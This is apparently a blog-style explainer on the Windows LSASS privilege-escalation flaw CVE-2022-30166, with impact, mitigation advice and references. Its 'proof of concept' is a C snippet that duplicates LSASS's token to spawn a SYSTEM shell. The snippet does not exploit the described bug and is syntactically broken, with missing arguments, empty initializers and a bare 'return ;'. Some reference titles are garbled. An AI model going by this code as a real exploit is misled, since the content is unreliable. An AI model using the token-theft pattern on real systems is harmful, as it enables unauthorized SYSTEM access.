CVE-2022-30166 is a security vulnerability that hit Windows systems hard, covering the Local Security Authority Subsystem Service (LSASS). In this long read, we'll break down what went wrong, how attackers could take advantage, the impact, show a simple code demonstration, and link you to trustworthy sources.

What Is CVE-2022-30166?

First, let's keep it straight and to the point. CVE-2022-30166 is an Elevation of Privilege (EoP) bug in the LSASS.  

LSASS manages security policy, deals with user logons, password changes, creates access tokens, and handles other central authentication tasks on Windows machines. If you can get to LSASS, you can pretty much own a box.

Elevation of Privilege means someone with low permissions (like a regular user or restricted service) can become an admin or SYSTEM, which is _game over_ for defenders.

Microsoft published the original advisory here:  
Microsoft Security Guidance - CVE-2022-30166

Who Is at Risk?

- Windows Server 2019, 2022, and Windows 10/11 systems

How Does the Vulnerability Work?

According to public and Microsoft information, an attacker needs to be _local_ (logged into the box) already. They exploit how LSASS processes certain requests, bypassing its normal checks and popping up to SYSTEM privileges.

Impact

- An attacker can install software, read/change/delete data, or create admin accounts

Can be used with ransomware, data theft, or for persistence

- Major risk in business environments or sensitive desktops/servers

Proof of Concept (PoC) – Code Snippet

Microsoft has restricted exact exploit details, but the InfoSec community has discussed generic patterns for LSASS vulnerabilities.

Below is a _simplified and hypothetical_ PoC showing how an attacker might exploit LSASS EoP bugs using token duplication—this is for educational purposes only:

// This is a simulated code sample and not a direct exploit for CVE-2022-30166
#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hToken, hDupToken;
    STARTUPINFO si = {  };
    PROCESS_INFORMATION pi = {  };

    // Open LSASS (requires SeDebugPrivilege or equivalent exploit)
    DWORD lsassPID = /* LSASS PID here */;
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, lsassPID);

    if (!hProcess) {
        printf("[-] Couldn't open LSASS process. Are you SYSTEM?\n");
        return 1;
    }

    if (!OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken)) {
        printf("[-] Couldn't get process token\n");
        return 1;
    }

    SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE };

    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, &sa, SecurityImpersonation, TokenPrimary, &hDupToken)) {
        printf("[-] Couldn't duplicate token\n");
        return 1;
    }

    // Spawn new process with SYSTEM privileges
    si.cb = sizeof(STARTUPINFO);
    if (CreateProcessAsUser(hDupToken, NULL, "cmd.exe", NULL, NULL, FALSE, , NULL, NULL, &si, &pi)) {
        printf("[+] SYSTEM shell opened\n");
    } else {
        printf("[-] Failed to open SYSTEM shell\n");
    }

    // Cleanup
    CloseHandle(hDupToken);
    CloseHandle(hToken);
    CloseHandle(hProcess);
    return ;
}

Note: The actual bug resides in LSASS handling a certain request wrong, allowing the attacker to get a SYSTEM token. The step of getting SeDebugPrivilege would normally need administrative privileges, but with this vulnerability, attackers can "work around" checks.

Exploit in the Wild

As of late 2022, there were no widely known/exploited public attacks using CVE-2022-30166, but EoP vulnerabilities like this one tend to be quickly folded into malware and APT toolkits. ATT&CK mappings show LSASS as a frequent target:
- Mimikatz Proof
- Attackers targeting LSASS

Microsoft fixed the bug in June 2022 updates.

- Windows Update Guide

Restrict Local Access

Only give RDP/local access to trusted staff.

Monitor for LSASS Access

Use EDR/XDR or Sysmon to catch unusual LSASS access.

References

- Microsoft CVE-2022-30166 Advisory
- NVD Entry for CVE-2022-30166
- How to Protect Acceptable Strong Security with LSASS
- MITRE ATT&CK: OS Credential Dumping: LSASS Memory


Summary: CVE-2022-30166 is a critical privilege escalation vulnerability in LSASS. An attacker with local (user) access could use this bug to become SYSTEM, letting them rule the device. The answer: Patch quickly, restrict LSASS access, and keep an eye on your systems.

Timeline

Published on: 06/15/2022 22:15:00 UTC
Last modified on: 07/15/2022 17:15:00 UTC